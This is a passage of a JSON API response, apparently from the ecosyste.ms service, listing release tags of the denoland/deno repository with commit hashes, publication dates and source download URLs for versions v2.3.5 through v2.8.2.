.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland